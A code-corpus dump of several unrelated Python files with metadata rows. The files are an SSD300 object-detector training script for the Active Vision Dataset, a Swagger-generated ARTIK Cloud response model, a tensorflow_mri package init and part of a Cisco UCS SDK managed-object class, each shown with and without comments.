if b":" in hostport:
host, port = hostport.rsplit(b":", 1)
try:
port = int(port)
return host, port
except ValueError:
# IPv6 address.
pass
return hostport, default_port
| true | true |
f7193e638c0b7630f3bb08df8302e36c5888e4d8 | 889 | py | Python | tensorflow_mri/python/layers/__init__.py | mrphys/tensorflow-mri | 46a8929aec4180aba4961f902897e02592f25da6 | [
"Apache-2.0"
] | 3 | 2021-07-28T17:22:26.000Z | 2022-03-29T15:17:26.000Z | tensorflow_mri/python/layers/__init__.py | mrphys/tensorflow-mri | 46a8929aec4180aba4961f902897e02592f25da6 | [
"Apache-2.0"
] | 1 | 2021-07-23T01:37:11.000Z | 2021-07-23T01:37:11.000Z | tensorflow_mri/python/layers/__init__.py | mrphys/tensorflow-mri | 46a8929aec4180aba4961f902897e02592f25da6 | [
"Apache-2.0"
] | null | null | null | # Copyright 2021 University College London. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Neural network layers."""
from tensorflow_mri.python.layers.conv_blocks import *
from tensorflow_mri.python.layers.conv_endec import *
from tensorflow_mri.python.layers.preproc_layers import *
| 44.45 | 80 | 0.709786 |
from tensorflow_mri.python.layers.conv_blocks import *
from tensorflow_mri.python.layers.conv_endec import *
from tensorflow_mri.python.layers.preproc_layers import *
| true | true |
f7193e94de77b2cad9feb7c3c07ac84c618b271a | 13,089 | py | Python | train.py | fab464654/SSD_on_ActiveVisionDataset | 1bc6f0745241d0b45c3f257c6fb09ea0435c993e | [
"MIT"
] | null | null | null | train.py | fab464654/SSD_on_ActiveVisionDataset | 1bc6f0745241d0b45c3f257c6fb09ea0435c993e | [
"MIT"
] | null | null | null | train.py | fab464654/SSD_on_ActiveVisionDataset | 1bc6f0745241d0b45c3f257c6fb09ea0435c993e | [
"MIT"
] | null | null | null | import time
import torch.backends.cudnn as cudnn
import torch.optim
import torch.utils.data
from model import SSD300, MultiBoxLoss
from datasets import PascalVOCDataset
from utils import *
# Data parameters
data_folder = 'google_drive/MyDrive/ColabNotebooks/Project/GT' # folder with data files
keep_difficult = True # use objects considered difficult to detect?
# Model parameters
# Not too many here since the SSD300 has a very specific structure
n_classes = len(label_map) # number of different types of objects
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
# Learning parameters
checkpoint = "google_drive/MyDrive/checkpointsIeri/checkpoint_ssd300.pth.tar" # path to model checkpoint, None if none
batch_size = 9 # batch size
iterations = 120000 # number of iterations to train
workers = 4 # number of workers for loading data in the DataLoader
print_freq = 5 # print training status every __ batches
lr = 5e-4 # learning rate
decay_lr_at = [80000, 100000] # decay learning rate after these many iterations
decay_lr_to = 0.1 # decay learning rate to this fraction of the existing learning rate
momentum = 0.9 # momentum
weight_decay = 5e-4 # weight decay
grad_clip = None # clip if gradients are exploding, which may happen at larger batch sizes (sometimes at 32) - you will recognize it by a sorting error in the MuliBox loss calculation
cudnn.benchmark = True
def main():
"""
Training.
"""
global start_epoch, label_map, epoch, checkpoint, decay_lr_at
# Initialize model or load checkpoint
if checkpoint is None:
start_epoch = 0
model = SSD300(n_classes=n_classes)
# Initialize the optimizer, with twice the default learning rate for biases, as in the original Caffe repo
biases = list()
not_biases = list()
for param_name, param in model.named_parameters():
if param.requires_grad:
if param_name.endswith('.bias'):
biases.append(param)
else:
not_biases.append(param)
optimizer = torch.optim.SGD(params=[{'params': biases, 'lr': 2 * lr}, {'params': not_biases}],
lr=lr, momentum=momentum, weight_decay=weight_decay)
else:
checkpoint = torch.load(checkpoint)
start_epoch = checkpoint['epoch'] + 1
print('\nLoaded checkpoint from epoch %d.\n' % start_epoch)
model = checkpoint['model']
optimizer = checkpoint['optimizer']
# Move to default device
model = model.to(device)
criterion = MultiBoxLoss(priors_cxcy=model.priors_cxcy).to(device)
#import active_vision_dataset_processing.data_loading
import transforms, active_vision_dataset
#Include all instances
pick_trans = transforms.PickInstances(range(34))
TRAIN_PATH = "./google_drive/MyDrive/ColabNotebooks/Project/trainDataset"
train_dataset = active_vision_dataset.AVD(root=TRAIN_PATH, train=True,
target_transform=pick_trans,
scene_list=['Home_001_1',
'Home_002_1',
'Home_003_1',
'Home_004_1',
'Home_005_1',
'Home_006_1',
'Home_007_1',
'Home_008_1',
'Home_014_1',
'Home_011_1',
'Home_010_1',
'Office_001_1'],
fraction_of_no_box=-1)
train_loader = torch.utils.data.DataLoader(train_dataset,
batch_size=batch_size,
shuffle=True,
collate_fn=active_vision_dataset.collate
)
"""
#I TRY TO USE THE DEFAULT DATASET LOADER::::::::::::::
# Custom dataloaders
train_dataset = PascalVOCDataset(data_folder,
split='train',
keep_difficult=keep_difficult)
train_loader = torch.utils.data.DataLoader(train_dataset, batch_size=batch_size, shuffle=True,
collate_fn=train_dataset.collate_fn, num_workers=workers,
pin_memory=True) # note that we're passing the collate function here
"""
# Calculate total number of epochs to train and the epochs to decay learning rate at (i.e. convert iterations to epochs)
# To convert iterations to epochs, divide iterations by the number of iterations per epoch
# The paper trains for 120,000 iterations with a batch size of 32, decays after 80,000 and 100,000 iterations
epochs = iterations // (len(train_dataset) // 32)
decay_lr_at = [it // (len(train_dataset) // 32) for it in decay_lr_at]
# Epochs
for epoch in range(start_epoch, epochs):
# Decay learning rate at particular epochs
if epoch in decay_lr_at:
adjust_learning_rate(optimizer, decay_lr_to)
# One epoch's training
train(train_loader=train_loader,
model=model,
criterion=criterion,
optimizer=optimizer,
epoch=epoch)
# Save checkpoint
save_checkpoint(epoch, model, optimizer)
def train(train_loader, model, criterion, optimizer, epoch):
"""
One epoch's training.
:param train_loader: DataLoader for training data
:param model: model
:param criterion: MultiBox loss
:param optimizer: optimizer
:param epoch: epoch number
"""
model.train() # training mode enables dropout
batch_time = AverageMeter() # forward prop. + back prop. time
data_time = AverageMeter() # data loading time
losses = AverageMeter() # loss
start = time.time()
import numpy as np
# Batches
for i, (images, labels) in enumerate(train_loader):
#CHECK / REMOVE THIS CODE!
data_time.update(time.time() - start)
#print(len(images))
#print(labels)
# Move to default device
data = images
a = np.asarray(data)
#print(a.shape)
#a = np.squeeze(a, axis=1) # shape should now be (L, 224, 224, 3)
#image = torch.from_numpy(a)
#image = image.permute(0,3,1,2)
#print(image.shape)
#Pre-processing:
from torchvision import transforms as transf
preprocess = transf.Compose([
transf.ToPILImage(),
transf.Resize(300),
transf.CenterCrop(300),
transf.ToTensor(),
transf.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),
])
for j in range(batch_size):
if j == 0:
input_tensor = preprocess(images[j])
input_tensor = input_tensor.unsqueeze(0)
input_batch = input_tensor
else:
input_tensor = preprocess(images[j])
#print(input_tensor)
input_tensor = input_tensor.unsqueeze(0) # create a mini-batch as expected by the model
#print(input_tensor.shape)
input_batch = torch.cat((input_batch, input_tensor), 0)
#print("shape images: ",input_batch.shape)
# In the Active Vision Dataset we have this formatting:
# [xmin ymin xmax ymax instance_id difficulty]
""" From the Tutorial:
Since the number of objects in any given image can vary, we can't use a fixed
size tensor for storing the bounding boxes for the entire batch of N images.
Therefore, ground truth bounding boxes fed to the model must be a list of
length N, where each element of the list is a Float tensor of dimensions
N_o, 4, where N_o is the number of objects present in that particular image.
Therefore, ground truth labels fed to the model must be a list of length N,
where each element of the list is a Long tensor of dimensions N_o, where N_o
is the number of objects present in that particular image.
"""
#Prints to test
#print(j)
box_id_diff = [b for b in labels[j][0]]
box = [l[0:4] for l in box_id_diff]
#print('before:',box) #To check
#Boundary coordinates as requested
for k in range(len(box)):
box[k][0] = box[k][0]/1920.0
box[k][2] = box[k][2]/1920.0
box[k][1] = box[k][1]/1080.0
box[k][3] = box[k][3]/1080.0
#print('after:',box) #To check
box_tensor = torch.FloatTensor(box).to(device)
#Done with the parameter in AVD method
"""
#Check if there are objects in the images
if j == 0:
start = True
if len(box_tensor) > 0:
if start == True:
box_list = box_tensor
start = False
elif start == False:
box_list = [box_list, box_tensor]
#box_list = torch.cat((box_list,box_tensor),0)
else:
start = True
"""
#print(box_tensor) #To check
if j == 0:
box_list = [box_tensor]
else:
box_list.append(box_tensor)
label = [l[4] for l in box_id_diff]
label_tensor = torch.LongTensor(label).to(device)
if j == 0:
label_list = [label_tensor]
else:
label_list.append(label_tensor)
#print(box_id_diff[0][0:4])
"""
if len(box_id_diff.size())-1 != 0:
if j == 0:
box = box_id_diff[0][0:4]
print("asad:",box)
#box = box.unsqueeze(0)
boxes = box
else:
box = [l[0:4] for l in box_id_diff]
#box = box.unsqueeze(0) # create a mini-batch as expected by the model
#print(input_tensor.shape)
boxes = torch.cat((boxes, box), 0)
print("boxes:", boxes)
"""
#box = torch.split(box_id_diff, 2)
#print(box)
"""
if not labels[j][0]:
labels = []
print("coasc")
else:
labels = [l.to(device) for l in torch.tensor(labels[j][0][4])]
"""
#print("list of boxes:",box_list)
#print("list of labels:", label_list)
images = input_batch.to(device) # (batch_size (N), 3, 300, 300)
#print(images.shape)
boxes = box_list
labels = label_list
# Forward prop.
predicted_locs, predicted_scores = model(images) # (N, 8732, 4), (N, 8732, n_classes)
#Prints to check the dimensions
#print(predicted_locs.shape) #correct
#print(predicted_scores.shape) #correct
# Loss
loss = criterion(predicted_locs, predicted_scores, boxes, labels) # scalar
# Backward prop.
optimizer.zero_grad()
loss.backward()
# Clip gradients, if necessary
if grad_clip is not None:
clip_gradient(optimizer, grad_clip)
# Update model
optimizer.step()
losses.update(loss.item(), images.size(0))
batch_time.update(time.time() - start)
start = time.time()
# Print status
if i % print_freq == 0:
print('Epoch: [{0}][{1}/{2}]\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'.format(epoch, i, len(train_loader), loss=losses))
"""
print('Epoch: [{0}][{1}/{2}]\t'
'Batch Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Data Time {data_time.val:.3f} ({data_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'.format(epoch, i, len(train_loader),
batch_time=batch_time,
data_time=data_time, loss=losses))
"""
del predicted_locs, predicted_scores, images, boxes, labels # free some memory since their histories may be stored
if __name__ == '__main__':
main()
| 38.049419 | 184 | 0.537627 | import time
import torch.backends.cudnn as cudnn
import torch.optim
import torch.utils.data
from model import SSD300, MultiBoxLoss
from datasets import PascalVOCDataset
from utils import *
data_folder = 'google_drive/MyDrive/ColabNotebooks/Project/GT'
keep_difficult = True
n_classes = len(label_map)
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
checkpoint = "google_drive/MyDrive/checkpointsIeri/checkpoint_ssd300.pth.tar"
batch_size = 9
iterations = 120000
workers = 4
print_freq = 5
lr = 5e-4
decay_lr_at = [80000, 100000]
decay_lr_to = 0.1
momentum = 0.9
weight_decay = 5e-4
grad_clip = None
cudnn.benchmark = True
def main():
global start_epoch, label_map, epoch, checkpoint, decay_lr_at
if checkpoint is None:
start_epoch = 0
model = SSD300(n_classes=n_classes)
biases = list()
not_biases = list()
for param_name, param in model.named_parameters():
if param.requires_grad:
if param_name.endswith('.bias'):
biases.append(param)
else:
not_biases.append(param)
optimizer = torch.optim.SGD(params=[{'params': biases, 'lr': 2 * lr}, {'params': not_biases}],
lr=lr, momentum=momentum, weight_decay=weight_decay)
else:
checkpoint = torch.load(checkpoint)
start_epoch = checkpoint['epoch'] + 1
print('\nLoaded checkpoint from epoch %d.\n' % start_epoch)
model = checkpoint['model']
optimizer = checkpoint['optimizer']
model = model.to(device)
criterion = MultiBoxLoss(priors_cxcy=model.priors_cxcy).to(device)
import transforms, active_vision_dataset
pick_trans = transforms.PickInstances(range(34))
TRAIN_PATH = "./google_drive/MyDrive/ColabNotebooks/Project/trainDataset"
train_dataset = active_vision_dataset.AVD(root=TRAIN_PATH, train=True,
target_transform=pick_trans,
scene_list=['Home_001_1',
'Home_002_1',
'Home_003_1',
'Home_004_1',
'Home_005_1',
'Home_006_1',
'Home_007_1',
'Home_008_1',
'Home_014_1',
'Home_011_1',
'Home_010_1',
'Office_001_1'],
fraction_of_no_box=-1)
train_loader = torch.utils.data.DataLoader(train_dataset,
batch_size=batch_size,
shuffle=True,
collate_fn=active_vision_dataset.collate
)
epochs = iterations // (len(train_dataset) // 32)
decay_lr_at = [it // (len(train_dataset) // 32) for it in decay_lr_at]
for epoch in range(start_epoch, epochs):
if epoch in decay_lr_at:
adjust_learning_rate(optimizer, decay_lr_to)
train(train_loader=train_loader,
model=model,
criterion=criterion,
optimizer=optimizer,
epoch=epoch)
# Save checkpoint
save_checkpoint(epoch, model, optimizer)
def train(train_loader, model, criterion, optimizer, epoch):
model.train() # training mode enables dropout
batch_time = AverageMeter() # forward prop. + back prop. time
data_time = AverageMeter() # data loading time
losses = AverageMeter() # loss
start = time.time()
import numpy as np
# Batches
for i, (images, labels) in enumerate(train_loader):
#CHECK / REMOVE THIS CODE!
data_time.update(time.time() - start)
#print(len(images))
#print(labels)
# Move to default device
data = images
a = np.asarray(data)
#print(a.shape)
#a = np.squeeze(a, axis=1) # shape should now be (L, 224, 224, 3)
#image = torch.from_numpy(a)
#image = image.permute(0,3,1,2)
#print(image.shape)
#Pre-processing:
from torchvision import transforms as transf
preprocess = transf.Compose([
transf.ToPILImage(),
transf.Resize(300),
transf.CenterCrop(300),
transf.ToTensor(),
transf.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),
])
for j in range(batch_size):
if j == 0:
input_tensor = preprocess(images[j])
input_tensor = input_tensor.unsqueeze(0)
input_batch = input_tensor
else:
input_tensor = preprocess(images[j])
#print(input_tensor)
input_tensor = input_tensor.unsqueeze(0) # create a mini-batch as expected by the model
#print(input_tensor.shape)
input_batch = torch.cat((input_batch, input_tensor), 0)
#print("shape images: ",input_batch.shape)
# In the Active Vision Dataset we have this formatting:
# [xmin ymin xmax ymax instance_id difficulty]
#Prints to test
#print(j)
box_id_diff = [b for b in labels[j][0]]
box = [l[0:4] for l in box_id_diff]
#print('before:',box) #To check
#Boundary coordinates as requested
for k in range(len(box)):
box[k][0] = box[k][0]/1920.0
box[k][2] = box[k][2]/1920.0
box[k][1] = box[k][1]/1080.0
box[k][3] = box[k][3]/1080.0
#print('after:',box) #To check
box_tensor = torch.FloatTensor(box).to(device)
#Done with the parameter in AVD method
#print(box_tensor) #To check
if j == 0:
box_list = [box_tensor]
else:
box_list.append(box_tensor)
label = [l[4] for l in box_id_diff]
label_tensor = torch.LongTensor(label).to(device)
if j == 0:
label_list = [label_tensor]
else:
label_list.append(label_tensor)
#print(box_id_diff[0][0:4])
#box = torch.split(box_id_diff, 2)
#print(box)
#print("list of boxes:",box_list)
#print("list of labels:", label_list)
images = input_batch.to(device) # (batch_size (N), 3, 300, 300)
#print(images.shape)
boxes = box_list
labels = label_list
# Forward prop.
predicted_locs, predicted_scores = model(images) # (N, 8732, 4), (N, 8732, n_classes)
#Prints to check the dimensions
#print(predicted_locs.shape) #correct
#print(predicted_scores.shape) #correct
# Loss
loss = criterion(predicted_locs, predicted_scores, boxes, labels) # scalar
# Backward prop.
optimizer.zero_grad()
loss.backward()
# Clip gradients, if necessary
if grad_clip is not None:
clip_gradient(optimizer, grad_clip)
# Update model
optimizer.step()
losses.update(loss.item(), images.size(0))
batch_time.update(time.time() - start)
start = time.time()
# Print status
if i % print_freq == 0:
print('Epoch: [{0}][{1}/{2}]\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'.format(epoch, i, len(train_loader), loss=losses))
del predicted_locs, predicted_scores, images, boxes, labels # free some memory since their histories may be stored
if __name__ == '__main__':
main()
| true | true |
f7193ee3518594b970384543fd7069dcd703cf96 | 7,181 | py | Python | artikcloud/models/aggregates_histogram_response.py | artikcloud/artikcloud-python-dev | 683cd8304f031913bcd581d1eb78ee0efbc5c113 | [
"Apache-2.0"
] | null | null | null | artikcloud/models/aggregates_histogram_response.py | artikcloud/artikcloud-python-dev | 683cd8304f031913bcd581d1eb78ee0efbc5c113 | [
"Apache-2.0"
] | null | null | null | artikcloud/models/aggregates_histogram_response.py | artikcloud/artikcloud-python-dev | 683cd8304f031913bcd581d1eb78ee0efbc5c113 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
ARTIK Cloud API
No descripton provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: 2.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from pprint import pformat
from six import iteritems
import re
class AggregatesHistogramResponse(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, data=None, end_date=None, field=None, interval=None, sdid=None, size=None, start_date=None):
"""
AggregatesHistogramResponse - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'data': 'list[AggregatesHistogramData]',
'end_date': 'int',
'field': 'str',
'interval': 'str',
'sdid': 'str',
'size': 'int',
'start_date': 'int'
}
self.attribute_map = {
'data': 'data',
'end_date': 'endDate',
'field': 'field',
'interval': 'interval',
'sdid': 'sdid',
'size': 'size',
'start_date': 'startDate'
}
self._data = data
self._end_date = end_date
self._field = field
self._interval = interval
self._sdid = sdid
self._size = size
self._start_date = start_date
@property
def data(self):
"""
Gets the data of this AggregatesHistogramResponse.
:return: The data of this AggregatesHistogramResponse.
:rtype: list[AggregatesHistogramData]
"""
return self._data
@data.setter
def data(self, data):
"""
Sets the data of this AggregatesHistogramResponse.
:param data: The data of this AggregatesHistogramResponse.
:type: list[AggregatesHistogramData]
"""
self._data = data
@property
def end_date(self):
"""
Gets the end_date of this AggregatesHistogramResponse.
:return: The end_date of this AggregatesHistogramResponse.
:rtype: int
"""
return self._end_date
@end_date.setter
def end_date(self, end_date):
"""
Sets the end_date of this AggregatesHistogramResponse.
:param end_date: The end_date of this AggregatesHistogramResponse.
:type: int
"""
self._end_date = end_date
@property
def field(self):
"""
Gets the field of this AggregatesHistogramResponse.
:return: The field of this AggregatesHistogramResponse.
:rtype: str
"""
return self._field
@field.setter
def field(self, field):
"""
Sets the field of this AggregatesHistogramResponse.
:param field: The field of this AggregatesHistogramResponse.
:type: str
"""
self._field = field
@property
def interval(self):
"""
Gets the interval of this AggregatesHistogramResponse.
:return: The interval of this AggregatesHistogramResponse.
:rtype: str
"""
return self._interval
@interval.setter
def interval(self, interval):
"""
Sets the interval of this AggregatesHistogramResponse.
:param interval: The interval of this AggregatesHistogramResponse.
:type: str
"""
self._interval = interval
@property
def sdid(self):
"""
Gets the sdid of this AggregatesHistogramResponse.
:return: The sdid of this AggregatesHistogramResponse.
:rtype: str
"""
return self._sdid
@sdid.setter
def sdid(self, sdid):
"""
Sets the sdid of this AggregatesHistogramResponse.
:param sdid: The sdid of this AggregatesHistogramResponse.
:type: str
"""
self._sdid = sdid
@property
def size(self):
"""
Gets the size of this AggregatesHistogramResponse.
:return: The size of this AggregatesHistogramResponse.
:rtype: int
"""
return self._size
@size.setter
def size(self, size):
"""
Sets the size of this AggregatesHistogramResponse.
:param size: The size of this AggregatesHistogramResponse.
:type: int
"""
self._size = size
@property
def start_date(self):
"""
Gets the start_date of this AggregatesHistogramResponse.
:return: The start_date of this AggregatesHistogramResponse.
:rtype: int
"""
return self._start_date
@start_date.setter
def start_date(self, start_date):
"""
Sets the start_date of this AggregatesHistogramResponse.
:param start_date: The start_date of this AggregatesHistogramResponse.
:type: int
"""
self._start_date = start_date
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| 25.464539 | 115 | 0.576521 |
from pprint import pformat
from six import iteritems
import re
class AggregatesHistogramResponse(object):
def __init__(self, data=None, end_date=None, field=None, interval=None, sdid=None, size=None, start_date=None):
self.swagger_types = {
'data': 'list[AggregatesHistogramData]',
'end_date': 'int',
'field': 'str',
'interval': 'str',
'sdid': 'str',
'size': 'int',
'start_date': 'int'
}
self.attribute_map = {
'data': 'data',
'end_date': 'endDate',
'field': 'field',
'interval': 'interval',
'sdid': 'sdid',
'size': 'size',
'start_date': 'startDate'
}
self._data = data
self._end_date = end_date
self._field = field
self._interval = interval
self._sdid = sdid
self._size = size
self._start_date = start_date
@property
def data(self):
return self._data
@data.setter
def data(self, data):
self._data = data
@property
def end_date(self):
return self._end_date
@end_date.setter
def end_date(self, end_date):
self._end_date = end_date
@property
def field(self):
return self._field
@field.setter
def field(self, field):
self._field = field
@property
def interval(self):
return self._interval
@interval.setter
def interval(self, interval):
self._interval = interval
@property
def sdid(self):
return self._sdid
@sdid.setter
def sdid(self, sdid):
self._sdid = sdid
@property
def size(self):
return self._size
@size.setter
def size(self, size):
self._size = size
@property
def start_date(self):
return self._start_date
@start_date.setter
def start_date(self, start_date):
self._start_date = start_date
def to_dict(self):
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
return pformat(self.to_dict())
def __repr__(self):
return self.to_str()
def __eq__(self, other):
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
| true | true |
f7193ef954651cd69d7c79d1330decefaa2e8768 | 9,116 | py | Python | ucsmsdk/mometa/equipment/EquipmentRackEnclosure.py | Kego/ucsmsdk | 244f283a5c295cf746110bb96686d079b19927ce | [
"Apache-2.0"
] | 78 | 2015-11-30T14:10:05.000Z | 2022-02-13T00:29:08.000Z | ucsmsdk/mometa/equipment/EquipmentRackEnclosure.py | Kego/ucsmsdk | 244f283a5c295cf746110bb96686d079b19927ce | [
"Apache-2.0"
] | 113 | 2015-11-20T09:42:46.000Z | 2022-03-16T16:53:29.000Z | ucsmsdk/mometa/equipment/EquipmentRackEnclosure.py | Kego/ucsmsdk | 244f283a5c295cf746110bb96686d079b19927ce | [
"Apache-2.0"
] | 86 | 2015-12-12T08:22:18.000Z | 2022-01-23T03:56:34.000Z | """This module contains the general information for EquipmentRackEnclosure ManagedObject."""
from ...ucsmo import ManagedObject
from ...ucscoremeta import MoPropertyMeta, MoMeta
from ...ucsmeta import VersionMeta
class EquipmentRackEnclosureConsts:
MFG_TIME_NOT_APPLICABLE = "not-applicable"
OPERABILITY_ACCESSIBILITY_PROBLEM = "accessibility-problem"
OPERABILITY_AUTO_UPGRADE = "auto-upgrade"
OPERABILITY_BACKPLANE_PORT_PROBLEM = "backplane-port-problem"
OPERABILITY_BIOS_POST_TIMEOUT = "bios-post-timeout"
OPERABILITY_CHASSIS_INTRUSION = "chassis-intrusion"
OPERABILITY_CHASSIS_LIMIT_EXCEEDED = "chassis-limit-exceeded"
OPERABILITY_CONFIG = "config"
OPERABILITY_DECOMISSIONING = "decomissioning"
OPERABILITY_DEGRADED = "degraded"
OPERABILITY_DISABLED = "disabled"
OPERABILITY_DISCOVERY = "discovery"
OPERABILITY_DISCOVERY_FAILED = "discovery-failed"
OPERABILITY_EQUIPMENT_PROBLEM = "equipment-problem"
OPERABILITY_FABRIC_CONN_PROBLEM = "fabric-conn-problem"
OPERABILITY_FABRIC_UNSUPPORTED_CONN = "fabric-unsupported-conn"
OPERABILITY_IDENTIFY = "identify"
OPERABILITY_IDENTITY_UNESTABLISHABLE = "identity-unestablishable"
OPERABILITY_INOPERABLE = "inoperable"
OPERABILITY_LINK_ACTIVATE_BLOCKED = "link-activate-blocked"
OPERABILITY_MALFORMED_FRU = "malformed-fru"
OPERABILITY_NON_OPTIMAL = "non-optimal"
OPERABILITY_NON_OPTIMAL_SEVERE = "non-optimal-severe"
OPERABILITY_NOT_SUPPORTED = "not-supported"
OPERABILITY_OPERABLE = "operable"
OPERABILITY_PEER_COMM_PROBLEM = "peer-comm-problem"
OPERABILITY_PERFORMANCE_PROBLEM = "performance-problem"
OPERABILITY_POST_FAILURE = "post-failure"
OPERABILITY_POWER_PROBLEM = "power-problem"
OPERABILITY_POWERED_OFF = "powered-off"
OPERABILITY_REMOVED = "removed"
OPERABILITY_THERMAL_PROBLEM = "thermal-problem"
OPERABILITY_UNKNOWN = "unknown"
OPERABILITY_UNSUPPORTED_CONFIG = "unsupported-config"
OPERABILITY_UPGRADE_PROBLEM = "upgrade-problem"
OPERABILITY_VOLTAGE_PROBLEM = "voltage-problem"
PRESENCE_EMPTY = "empty"
PRESENCE_EQUIPPED = "equipped"
PRESENCE_EQUIPPED_DEPRECATED = "equipped-deprecated"
PRESENCE_EQUIPPED_DISC_ERROR = "equipped-disc-error"
PRESENCE_EQUIPPED_DISC_IN_PROGRESS = "equipped-disc-in-progress"
PRESENCE_EQUIPPED_DISC_NOT_STARTED = "equipped-disc-not-started"
PRESENCE_EQUIPPED_DISC_UNKNOWN = "equipped-disc-unknown"
PRESENCE_EQUIPPED_IDENTITY_UNESTABLISHABLE = "equipped-identity-unestablishable"
PRESENCE_EQUIPPED_NOT_PRIMARY = "equipped-not-primary"
PRESENCE_EQUIPPED_SLAVE = "equipped-slave"
PRESENCE_EQUIPPED_UNSUPPORTED = "equipped-unsupported"
PRESENCE_EQUIPPED_WITH_MALFORMED_FRU = "equipped-with-malformed-fru"
PRESENCE_INACCESSIBLE = "inaccessible"
PRESENCE_MISMATCH = "mismatch"
PRESENCE_MISMATCH_IDENTITY_UNESTABLISHABLE = "mismatch-identity-unestablishable"
PRESENCE_MISMATCH_SLAVE = "mismatch-slave"
PRESENCE_MISSING = "missing"
PRESENCE_MISSING_SLAVE = "missing-slave"
PRESENCE_NOT_SUPPORTED = "not-supported"
PRESENCE_UNAUTHORIZED = "unauthorized"
PRESENCE_UNKNOWN = "unknown"
class EquipmentRackEnclosure(ManagedObject):
"""This is EquipmentRackEnclosure class."""
consts = EquipmentRackEnclosureConsts()
naming_props = set(['id'])
mo_meta = MoMeta("EquipmentRackEnclosure", "equipmentRackEnclosure", "rack-enclosure-[id]", VersionMeta.Version401a, "InputOutput", 0x3f, [], ["admin", "pn-equipment", "pn-maintenance", "pn-policy"], ['topSystem'], ['equipmentFanModule', 'equipmentPsu', 'equipmentSlotEp'], [None])
prop_meta = {
"asset_tag": MoPropertyMeta("asset_tag", "assetTag", "string", VersionMeta.Version401a, MoPropertyMeta.READ_ONLY, None, None, None, r"""[ !#$%&\(\)\*\+,\-\./:;\?@\[\]_\{\|\}~a-zA-Z0-9]{0,32}""", [], []),
"child_action": MoPropertyMeta("child_action", "childAction", "string", VersionMeta.Version401a, MoPropertyMeta.INTERNAL, 0x2, None, None, r"""((deleteAll|ignore|deleteNonPresent),){0,2}(deleteAll|ignore|deleteNonPresent){0,1}""", [], []),
"dn": MoPropertyMeta("dn", "dn", "string", VersionMeta.Version401a, MoPropertyMeta.READ_ONLY, 0x4, 0, 256, None, [], []),
"flt_aggr": MoPropertyMeta("flt_aggr", "fltAggr", "ulong", VersionMeta.Version401a, MoPropertyMeta.INTERNAL, None, None, None, None, [], []),
"id": MoPropertyMeta("id", "id", "uint", VersionMeta.Version401a, MoPropertyMeta.NAMING, 0x8, None, None, None, [], []),
"mfg_time": MoPropertyMeta("mfg_time", "mfgTime", "string", VersionMeta.Version401a, MoPropertyMeta.READ_ONLY, None, None, None, r"""([0-9]){4}-([0-9]){2}-([0-9]){2}T([0-9]){2}:([0-9]){2}:([0-9]){2}((\.([0-9]){3})){0,1}""", ["not-applicable"], []),
"model": MoPropertyMeta("model", "model", "string", VersionMeta.Version401a, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
"oper_qualifier_reason": MoPropertyMeta("oper_qualifier_reason", "operQualifierReason", "string", VersionMeta.Version401a, MoPropertyMeta.READ_ONLY, None, None, None, r"""[ !#$%&\(\)\*\+,\-\./:;\?@\[\]_\{\|\}~a-zA-Z0-9]{0,256}""", [], []),
